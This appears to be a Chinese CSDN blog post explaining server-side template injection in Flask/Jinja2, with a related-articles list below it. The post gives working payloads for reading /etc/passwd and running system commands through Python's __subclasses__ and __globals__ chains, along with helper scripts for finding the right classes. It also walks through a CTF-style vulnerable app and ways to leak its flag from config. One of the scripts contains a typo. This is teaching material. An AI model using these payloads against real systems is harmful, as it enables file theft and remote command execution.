python模板注入

最新推荐文章于 2024-04-08 10:42:42 发布
最新推荐文章于 2024-04-08 10:42:42 发布
阅读量894 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RoboTerh/article/details/119411915
版权

ssti漏洞

其漏洞的产生在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内容作为变量解析替换。

  • 漏洞的解决方式:
    将template中的<h3>%s!</h3>%url更改为<h3>{{url}}</h3> 这样以来,Jinja2在模板渲染的时候将url的值替换掉{{url}}, 而不会对url内容进行二次渲染(这样即使url中含有{{}}也不会进行渲染,而只是把它当做普通字符串)

任意文件读取

类对象

‘’.__class__可以获取当前实例的类对象

类对象中的属性__mro__

''.__class__.__mro__获取当前类的继承类

类对象的方法__subclasses__()

''.__class__.__mro__[-1].__subclasses__()返回了类的所有存活的子类的引用(注意是类对象引用,不是实例)__mro__后面可以为-1或者2
我们可以找到具有文件读取功能的类,例如file对象

num = 0
for item in ''.__class__.__mro__[-1].__subclasses__() :
	try :
		if "file" in str(item) :
			print(num)
		num+=1
	except :
		num+=1
		continue

通过上面的python代码可以快速找到file对象的位置
假设file对象在40位:

payload:{{''.__class__.__mro__[-1].__subclasses__()[40]('/etc/passwd').read()}}

命令执行

我们还可以在object的所有子类中找可以引入了os模块的类,并以此来执行命令

#!usr/bin/env python
# encoding: utf-8  
num=0
for item in ''.__class__.__mro__[-1].__subclass__() :
	try :
		if 'os' in item.__init__.__globals__ :
			print(num)
		num+=1
	except :
		num+=1
		continue

通过上面的python代码可以找到包含os模块的类,构造命令执行语句

payload:{{''.__class__.__mro__[-1].__subclasses__()[num].__init__.__globals__['os'].system('ls')}}

就可以找到当前目录了

利用继承泄露信息

例如漏洞代码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
  • 如果没有过滤config,则可以通过config来泄露flag,因为config作为flask的一个全局变量储存着flask应用的信息
  • 如果能用self的话,可以通过self.__dict__来泄露flag
  • 如果没有过滤()的话,可以通过上面所说的__subclasses__()来泄露得到flag

因为这里过滤了config,self和self,所以要访问到config,所以首先得找到全局变量current_app
可以通过如下两种方法使用config找到flag

__globals__['current_app'].config['FLAG']

top.app.config['FLAG']

可以通过x.__globals__这样的格式,用py得到可以用的变量
可以知道url_for和get_flashed_messages的__globals__中均含有current_app

url_for.__globals__['current_app'].config  
get_flashed_messages.__globals__['current_app'].config

都可以获得flag.

RoboTerh
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-模板注入
m0_51428325的博客
12-26 1806
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有利于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
Python模板注入(SSTI)
sleepywin的博客
09-11 688
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入模板中的代码可能会引发RCE或XSS。攻击者可利用模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
SSTI(python模板注入)整理
最新发布
一只懒猫的博客
04-08 328
在使用django框架进行web应用设计时,不规范的代码使用。常用的的dgango代码为:还可以设置动态网址,python使用的web框架可以使用以下方法进行测试。
python攻击网站的方式_【技术分享】看我如何进行Python对象注入利用
weixin_39634576的博客
11-24 194
译者:天鸽预估稿费:130RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿简介在今天的 Defencely Lab 中,我们将详细介绍和演示 Python 对象注入攻击(Python Object Injection)的细节。整个演示将使用我们专门编写的易受攻击的应用程序和漏洞,源码可以在这里找到 –Github – Python Object Injection。需要的...
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 803
SSTI是个啥?SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
Python 模板引擎的注入问题分析
01-20
这几年比较火的一个漏洞就是jinjia2之类的模板引擎的注入,通过注入模板引擎的一些特定的指令格式,比如 {{1+1}} 而返回了 2 得知漏洞存在。实际类似的问题在Python原生字符串中就存在,尤其是Python 3.6新增 f 字符...
模板注入与_FLASK.pdf
08-08
本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 ...
Python Django框架模板渲染功能示例
09-18
当视图函数返回`HttpResponse`或`render`的结果时,Django会根据配置的模板路径查找相应的模板文件,并将视图中传递的上下文数据注入模板中,生成最终的HTML响应。 模板文件的加载顺序遵循以下规则: 1. 首先,...
常用python编程模板汇总
01-21
而一段经过测试的代码则可以多次使用,所以这里我就自己总结了一下python中常用的编程模板,如果还有哪些漏掉了请大家及时补充哈。 一、读写文件 1、读文件 (1)、一次性读取全部内容 \nfilepath='D:/data.txt' #...
Jinja2 模板注入&模板内命令执行
3569
03-13 2167
原因:        ichunqiu 的web中有一个 Musee de X ,知道 http:// 文件能获取,但是没有想到 file:// 获取文件,根据报错也没有想过他用的是 jinja2。后来朋友说payload每个环境可能不太一样,就自己尝试了一波。分析:      这是 python2 运行的,结果就是输出 whoami 的信息#code:utf-8 from jinja2 imp...
SSTI模板注入
0verWatch的博客
02-08 1万+
先入个门 Jimja2 Jinja2是默认的仿Django模板的一个模板引擎,由Flask的作者开发。网上搜的语法2333,方便自己回顾 模板 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ... #}:装载一个注释,模板渲染的时候会忽视这中间的值 变量 在模板中添加变量,可以使用(set)语句。 ...
Flask(Jinja2) 服务端模板注入漏洞
Hard Working
12-10 6444
其实我根本没用过flask模板,但是最近在学习python,研究下划线,莫名其妙地就学习到这里了。首先搭建一个flask环境。在github上下一个docker https://github.com/vulhub/vulhub/tree/master/flask/ssti 然后运行docker先来看一下代码: 由此,在浏览器中输入 http://your-ip/?name=leaf会出
Python学习之模板字符串与模板注入
qq_32506555的博客
01-03 1651
这几年python开发中,比较火的一个漏洞就是jinjia2之类的模板引擎的注入,通过注入模板引擎的一些特定的指令格式,比如 {{1+1}} 而返回了 2 得知漏洞存在。实际类似的问题在Python原生字符串中就存在,尤其是Python 3.6新增 f 字符串后,虽然利用还不明确,但是应该引起注意。   最原始的 %   userdata = {"user" : "jdoe", "
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
python利用什么写模板_Python-模板注入
weixin_39724287的博客
11-24 86
何为模板注入模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。但是模板引擎也拓宽了我们的攻击面。注入模板中的代码可能会引发RCE或者XSS。flask基础在学习SSTI之前,先把flask的运作流程搞明白。这样有利用更快速的理解原理。路由先看一段代码from flask import flask@app.rout...
pymysql防sql注入的书写规范,和orm的防注入原理
lyp_CSDN的博客
09-09 1262
sql注入演示: ’ ’ or 1 解决方案:将搜索对象写到execute里边就可以防注入 """ pymysql 让我们可以书写python代码来操作数据库 1、导入pymysql包 2、使用pymysql连接到数据库,创建连接对象 3、创建游标对象 4、操作数据库,执行sql语句 5、关闭游标对象 6、关闭连接对象 """ # 1、导入pymysql包 import pymy...
python-flask-ssti(模版注入漏洞)
diecai2192的博客
03-05 1184
SSTI(Server-Side Template Injection) 服务端模板注入 ,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 输出无过滤就注定会存在xss,当然还有更多深层次的漏洞。 前置知识 1.运行一个一个最小的 Flask 应用 from flask import Flask app = ...
python基于Django的高校社团学生会管理系统源码数据库论文.docx
07-03
同时,考虑到安全性,系统可能实施了CSRF(跨站请求伪造)防护和SQL注入防护等措施。 论文可能还深入探讨了系统的开发流程,包括需求分析、系统设计、编码实现、测试调试和后期维护等阶段。在开发过程中,可能运用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值